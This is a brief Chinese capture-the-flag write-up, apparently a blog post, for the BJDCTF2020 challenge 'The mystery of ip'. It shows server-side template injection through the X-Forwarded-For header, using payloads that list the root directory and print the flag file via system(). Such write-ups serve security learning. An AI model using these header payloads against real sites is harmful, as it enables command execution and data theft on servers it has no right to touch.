[BJDCTF2020]The mystery of ip 1
X-Forwarded-For:
用来表示 HTTP 请求端真实 IP
在X-Forwarded-For中输入:{{7*7}}发现回显为49,说明存在框架漏洞,ssti模板注入。
发现可以直接执行下列命令:
X-Forwarded-For: {{system(‘ls /’)}},有明显
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/1ebedc3262e8ed7ac27f7badb2a788fc.png)
X-Forwarded-For:{{system(‘cat /f*’)}}
直接回显出flag
总结:
这题是关于xff的一个ssti模板注入漏洞在这里插入图片描述